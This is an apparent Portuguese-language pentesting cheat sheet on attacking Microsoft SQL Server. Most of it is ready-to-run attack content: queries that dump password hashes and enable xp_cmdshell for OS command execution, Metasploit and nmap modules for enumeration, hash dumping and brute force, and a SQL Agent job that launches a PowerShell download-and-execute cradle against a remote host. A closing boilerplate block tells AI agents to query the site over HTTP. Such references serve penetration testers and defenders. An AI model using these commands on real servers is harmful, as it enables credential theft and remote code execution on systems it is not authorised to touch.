# Microsoft SQL Server ### Conectando ao Banco de Dados ```bash python3 -m mssqlcli.main -S -U -P ``` ### Queries Essenciais | QUERY | DESCRIÇÃO | | :------------------------------------------------------------------------------------------------------------------------------: | :---------------------------------------------------: | | SELECT @@version | Versão do MSSQL | | SELECT host\_name() | Hostname do servidor | | SELECT db\_name() | Database atual | | SELECT loginname FROM syslogins WHERE sysadmin = 1 | Extraindo Logins de SQL | | SELECT name FROM sys.databases | Exibindo todos os databases | | USE \ | Acessando um determinado database | | SELECT \* FROM sysusers | Exibindo todos os Sys Users | | SELECT name, password\_hash FROM master.sys.sql\_logins | Extraindo hashes dos usuários | | SELECT name, CONVERT(INT, ISNULL(value, value\_in\_use)) AS IsEnabled FROM sys.configurations WHERE name = 'xp\_cmdshell' | Verificando se `xp_cmdshell` está habilitado | | EXEC sp\_configure 'show advanced options', 1 ; RECONFIGURE ; exec SP\_CONFIGURE 'xp\_cmdshell', 1 ; RECONFIGURE | Habilitando o `xp_cmdshell` | | EXEC xp\_cmdshell "\" | Executando comando no sistema operacional | | SELECT servicename, service\_account FROM sys.dm\_server\_services | Nome e Conta de Serviço | | SELECT name AS database\_name, SUSER\_NAME(owner\_sid) AS database\_owner, is\_trustworthy\_on AS trustworthy FROM sys.databases | Pegando nome de usuários e seus respectivos databases | ### Executando Query #### sqlcmd Conectando-se no host MSSQL ```bash sqlcmd -S -U -P '' ``` Após conectar-se no host, é possível executar comandos SQL, porém ao digitar e query pressionar `Enter`, é preciso digitar `go` para determinar que o comando deve ser executado (semelhante ao ponto e vírgula). Por exemplo, para verificarmos a versão do MSSQL, utilizaríamos os seguintes comandos: ```bash select @@version go ``` #### Powershell ```bash Invoke-Sqlcmd -Query '' -Username -Password Invoke-Sqlcmd -Inputfile -Username -Password ``` #### Metasploit ```bash msfconsole -q use auxiliary/admin/mssql/mssql_sql set password set username set rhosts exploit ``` ### Enumeração #### Metasploit Enumeração do MSSQL ```bash msfconsole -q use auxiliary/admin/mssql/mssql_enum set rhost set username set password exploit ``` Enumeração de contas de usuário do Domínio através do MSSQL ```bash sudo msfconsole -q use auxiliary/admin/mssql/mssql_enum_domain_accounts set rhost exploit ``` #### nmap Informações sobre o MSSQL ```bash nmap -p 1433 --script ms-sql-info ``` Informações do MSSQL com NTLM ```bash nmap -p 1433 --script ms-sql-ntlm-info --script-args mssql.instance-port=1433 ``` ### Senha em Branco ```bash nmap -p 1433 --script ms-sql-empty-password ``` ### Extraindo Hashes ```bash nmap -p 1433 --script ms-sql-dump-hashes --script-args mssql.username=,mssql.password= ``` ### Listando Todos os Sys Users ```bash nmap --script ms-sql-query --script-args mssql.username=,mssql.password=,ms-sql-query.query="SELECT * FROM master..syslogins" -p 1433 ``` ### RCE ```bash nmap --script ms-sql-xp-cmdshell --script-args mssql.username=,mssql.password=,ms-sql-xp-cmdshell.cmd="" -p 1433 > ``` #### Acesso Direto ao SQL Server Caso alguma conta de usuário com o serviço "SQL Server Agent (MSSQLSERVER)", utilize a query abaixo para ganhar permissões. ```bash USE msdb;EXEC msdb.dbo.sp_delete_job @job_name = N'PowershellExec';EXEC dbo.sp_add_job @job_name = N'PowershellExec';EXEC sp_add_jobstep @job_name = N'PowershellExec', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'powershell -noexit -c "iex (iwr -UseBasicParsing http:///)"', @retry_attempts = 1, @retry_interval = 5;EXEC dbo.sp_add_jobserver @job_name = N'PowershellExec';EXEC dbo.sp_start_job N'PowershellExec' ``` ### Brute Force #### nmap (Remoto) ```bash nmap -p 1433 --script ms-sql-brute --script-args userdb=,passwd= ``` ### Sites ```bash https://learn.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://mysther.gitbook.io/knowledge-base/ataques/web-exploitation/injections/sql-injection/microsoft-sql-server.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.